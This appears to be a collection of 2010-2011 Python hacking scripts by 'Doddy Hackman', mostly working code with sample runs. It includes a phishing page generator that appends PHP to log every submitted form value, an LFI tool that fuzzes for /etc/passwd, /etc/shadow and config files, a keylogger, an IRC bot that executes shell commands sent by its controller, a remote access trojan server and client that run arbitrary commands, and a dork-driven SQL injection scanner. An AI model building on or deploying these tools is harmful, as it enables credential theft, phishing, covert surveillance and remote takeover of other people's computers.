#!usr/bin/python
#RFI Tester (C) Doddy Hackman
 
import os,sys,urllib2,re
 
def header() : 
 print "\n--== RFI Tester ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
def test(web):
 try:
  print "\n[+] Testing vulnerability RFI in",web
  code = toma(web+"http://www.supertangas.com")
  if(re.findall("Los mejores TANGAS de la red",code,re.I)):
   print "[+] RFI Detected"
  else:
   print "[-] RFI Not Found" 
 except:
  pass
 
header()
 
if len(sys.argv) != 2 : 
 show()
 
else :
 test(sys.argv[1])
 
copyright()
 
 
#The End
 

python rfi.py http://127.0.0.1/rfi.php?index=

C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010

#!usr/bin/python
#Phising Gen (C) Doddy Hackman
 
import urllib2,sys,os
 
 
def savefile(filename,text):
 file = open(filename,"w")
 file.write(text)
 
 
def header() : 
 print "\n\n--== Phising Gen ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
 
def gen(web,new):
 try:
  print "\n[+] Working in the phishing"
  code = toma(web) 
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  print "[+] The fake was save in",new
  savefile(new,code+"\n\n"+text)
 except:
  pass
 
header()
 
if len(sys.argv) != 3 : 
 show()
 
else :
 gen(sys.argv[1],sys.argv[2])
 
copyright()
 
#The End	
 
 
 

C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010

#!usr/bin/perl
#LFI T00l (C) Doddy Hackman
 
import os,sys,urllib2,re
 
files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
 
def header() : 
 print "\n--== LFI T00l ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
 
def fuzz(web):
 print "\n[+] Fuzzing files...\n"
 for file in files:
  code = toma(web+file)
  if not (re.findall("No such file or directory in",code)):
   print "[File Found] : ",web,file
 
 
 
def test(web):
 try:
  print "\n[+] Testing vulnerability LFI in",web
  code = toma(web+"'")
  if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
   fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
   print "\n[+] LFI Detected"
   print "[+] Full Path discloure : ",fpd[0]
   fuzz(web)
  else:
   print "[-] LFI Not Found" 
 except:
  pass
 
header()
 
if len(sys.argv) != 2 : 
 show()
 
else :
 test(sys.argv[1])
 
copyright()
 
 
#The End
 

python lfi.py http://127.0.0.1/lfi.php?file=

C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010

#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011
 
import pyHook,pythoncom
 
 
def savefile(name,text):
 file = open(name,"a")
 file.write(text+"\n")
 file.close()
 
def toma(frase):
 savefile("logs.txt",frase.Key)
 
def capturar():
 nave = pyHook.HookManager()
 nave.KeyDown = toma
 nave.HookKeyboard()
 pythoncom.PumpMessages()
 
while 1:
 capturar()
 
# The End

cmdnow TUCOMANDO

#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001
 
import re,socket
import subprocess
 
host = "127.0.0.1"
canal = "#locos"
nick = "bot"
 
irc = socket.socket()	
try:
 irc.connect((host,6667))
 irc.send("NICK "+nick+"\r\n")
 irc.send("USER "+nick+" 1 1 1 1\r\n")
 irc.send("JOIN "+canal+"\r\n")
 print "[+] Insane Bot Online\n"
 while 1:
  code = irc.recv(9999)
  if re.findall("PING",code):
   irc.send("PONG "+code.split()[1]+"\r\n")
  if re.findall("PRIVMSG",code):
   nick = code.split("!")
   nick = nick[0].replace(":","")
   msg = code.split(":")[2:][0]
   if re.findall("cmdnow",code):
    cmd = code.split("cmdnow")[1]
    irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
    rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    if rea:
     re1 = rea.stdout.read()
     total = re1.replace("\n","|") 
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
    else:
     re2 = rea.stderr.read()
     total = re2.replace("\n","|")
     irc.send("PRIVMSG "+canal+" : "+total+"\n")
 
 
except:
 print "\n\n[-] Error\n\n"
 
 
# The End
 

#!usr/bin/python
#Console (C) Doddy Hackman 2011
 
from Tkinter import *
import socket
 
global x,socket
 
def execa() :
 
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((str(host.get()),80))
 s.send(cmd.get()+"\r\n")
 data = s.recv(666)
 s.close()
 panel.insert(END,repr(data))
 
 
 
window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")
 
window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")
 
window.configure(background="black")
window.configure(cursor="tcross")
 
host = StringVar()
cmd = StringVar()
 
panel = Text(window,width=30,height=15,bg="black",fg="red")
 
Label(window,bg="black").grid(row=3)
 
Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)
 
Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)
 
Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)
 
 
Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)	
 
 
window.mainloop()
 

• Ocultar inicio
• Mostrar inicio
• Ocultar barra de tereas
• Mostrar barra de tareas
• Abrir CD
• Cerrar CD
• Ejecutar comandos
• Mostrar informacion

#!usr/bin/python
#Hell RAt (C) Doddy Hackman 2011
 
import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess
 
print "\n\n[+] Online\n\n"
 
slave = socket.socket()
slave.bind(("",666))
slave.listen(999)
 
a,b = slave.accept()
 
while True:
 rex = a.recv(20)
 if re.findall("getso",rex):
  z = os.name
  a.send(z)
 if re.findall("getpath",rex):
  h = os.getcwd()
  a.send(h)
 if re.findall("ocultarinicio",rex): 
  x = win32gui.FindWindow("Shell_TrayWnd","")
  win32gui.ShowWindow(x,win32con.SW_HIDE)
 elif re.findall("mostrarinicio",rex):
  x = win32gui.FindWindow("Shell_TrayWnd","")
  win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
 elif re.findall("ocultaricono",rex):
  x = win32gui.FindWindow(0,"Program Manager")
  win32gui.ShowWindow(x,win32con.SW_HIDE)
 elif re.findall("mostraricono",rex):
  x = win32gui.FindWindow(0,"Program Manager")
  win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
 elif re.findall("abrircd",rex):
  ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
 elif re.findall("cerrarcd",rex):
  ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
 else: 
  rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  if re:
   a.send(rea.stdout.read())
  else:
   a.send(rea.stderr.read())
 
 
# The End   

#!usr/bin/python 
#HellRat (C) Doddy Hackman 2011
 
import os,socket,sys
 
def head(): 
 print "\n\n-- == hELLrAT == --\n\n"
 
def copyright():
 print "\n\n(C) Doddy Hackman 2011\n\n"
 
def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")
 
def men():
 
 try:
  ip = raw_input("[+] IP : ")	
  client = socket.socket()		
  client.connect((ip,666))
  while True: 
   clean()
   print "\n\n[+] Welcome to ",ip,"\n\n"
   print "\n\n[1] Informacion"
   print "[2] CMD"
   print "[3] Abrir CD"
   print "[4] Cerrar CD"
   print "[5] Ocultar iconos"
   print "[6] Mostrar iconos"
   print "[7] Ocultar barra de tareas"
   print "[8] Mostrar barra de tareas"
   print "[9] Cambiar IP"
   print "[10] Salir"
   op = input("\n\n[Opcion] : ")
   if op == 1:
    print "\n\n[+] Informacion\n\n"
    client.send("getso")
    so = client.recv(999)
    client.send("getpath")
    path = client.recv(999)
    print "[+] SO : "+so  
    print "[+] Path : "+path
    raw_input()
   if op == 2: 
    cmd = raw_input("\n[CMD] : ")
    client.send(cmd)
    code = client.recv(999)
    print code
    raw_input()
   if op == 3:
    client.send("abrircd")
   if op == 4:
    client.send("cerrarcd") 
   if op == 5:
    client.send("ocultaricono")
   if op == 6:
    client.send("mostraricono")
   if op == 7:
    client.send("ocultarinicio")
   if op == 8:
    client.send("mostrarinicio")
   if op == 9:
    men()
   if op == 10:
    client.close()
    copyright()
    raw_input()
    sys.exit(1)
 except:
  print "\n\n[-] Error\n\n"
head()
men() 
 
# The End
 

#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011
 
 
import urllib2,re,os,sys
 
 
def head():
 print "\n\n -- == Google Iny == --\n"
 
def copyright(): 
 print "\n(C) Doddy Hackman 2011\n"
 sys.exit(1)
 
 
def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()
 
 
def show():
 print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"
 
def limpiar(pag):
 
 limpia = []
 for p in pag:
  if not (re.findall("http://www.google.com.ar",p,re.I)):
   if p not in limpia:
    limpia.append(p)
 return limpia
 
 
def sql(webs):
 for web in webs :
  if re.findall("=",web): 
   web = re.split("=",web)
   web = web[0]+"="
   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     print "[SQLI] : ",web,"\n"
   except:
    pass
 
def scan(dork,count): 
 pag = []
 s = 10  
 while s <= int(count):
  try:
   code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
   d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
   s += 10
   for a in d:
    pag.append(a)
  except:
   copyright()
 pag = limpiar(pag)
 
 return pag
 
head()
 
if len(sys.argv) != 3:
 show()
else :
 print "\n[+] SQL Scan Started\n"
 print "[+] Dork : ",sys.argv[1]
 print "[+] Count : ",sys.argv[2]
 pages = scan(sys.argv[1],sys.argv[2])
 print "\n[+] Webs Found : ",len(pages),"\n"
 sql(pages)
 
copyright()
 

#!usr/bin/python
#LFI T00l (C) Doddy Hackman
 
import os,sys,urllib2,re
 
dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']
 
def header() : 
 print "\n--== Fuzz DNS ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
 
def search(web):
 print "\n[+] Searching DNS in",web,"\n"
 try:
  for d in dns:
   toma("http://"+d+"."+web)
   print "[DNS Link] : http://"+d+"."+web 
 except:
  pass
 
header()
 
if len(sys.argv) != 2 : 
 show()
 
else :
 search(sys.argv[1])
 
copyright()
 
 
#The End
 

C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com 

(C) Doddy Hackman 2010

#!usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 20111
 
from ftplib import FTP
import sys
 
 
def head():
 print "\n -- == FTP Manger == --\n\n"
 
def copyright():
 print "\n\n(C) Doddy Hackman 2011\n"
 sys.exit(1)
 
def show():
 print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"
 
def menu():
 print "\n"
 print "1 : dir"
 print "2 : cwd"
 print "3 : chdir"
 print "4 : delete dir"
 print "5 : delete file"
 print "6 : rename file"
 print "7 : make directory"
 print "8 : size"
 print "9 : abort\n\n"
 op = input("[Option] : ")
 return op
 
 
def enter(host,user,password):	
 print "[+] Connecting to ",host,"\n"
 enter = FTP(host,user,password)
 print "\n[+] Enter in the system\n"
 
 def menu2():
  op = menu()
  if op == 1:
   try:
    lista = enter.dir()
    for a in lista:
     print a
    menu2()
   except:
    menu2()
  elif op == 2:
   try:
    print "\n\n[+] Path : "+enter.pwd()+"\n\n"
    menu2() 
   except:
    menu2()
  elif op == 3:
   try:
    dir = raw_input("\n\n[Directory] : ")
    enter.cwd(dir)
    print "\n\n[+] Directory Changed\n\n"
    menu2()
   except:
    menu2()
  elif op == 4:
   try:
    dir = raw_input("\n\n[Directory] : ")
    enter.rmd(dir)
    print "\n\n[+] Directory Deleted\n\n"
    menu2()
   except:
    menu2()
  elif op == 5:
   try:
    file = raw_input("\n\n[File] : ")
    enter.delete(file)
    print "\n\n[+] File Deleted\n\n"
    menu2()
   except:
    menu2()
  elif op == 6:
   try:
    oldfile = raw_input("\n\n[Name] : ")
    newfile = raw_input("\n[New Name] : ")
    enter.rename(oldfile,newfile) 
    print "\n\n[+] Name Changed\n\n"
    menu2()
   except:
    menu2()
  elif op == 7:
   try:
    dir = raw_input("\n\n[New Directory] : ")
    enter.mkd(dir)
    print "\n\n[+] Directory Created\n\n"
    menu2()
   except:
    menu2()
  elif op == 8:
   try:
    file = raw_input("\n\n[File] : ")
    peso = enter.size(file)
    print "\n\n[+] ",peso," KB \n\n"
    menu2()
   except:
    menu2()
  elif op == 9:
   enter.quit()
   copyright()
 
  else:
   menu2()      
 menu2()
 
 
 
head()
 
if len(sys.argv) != 4:
 show()
else:
 enter(sys.argv[1],sys.argv[2],sys.argv[3])
 
copyright()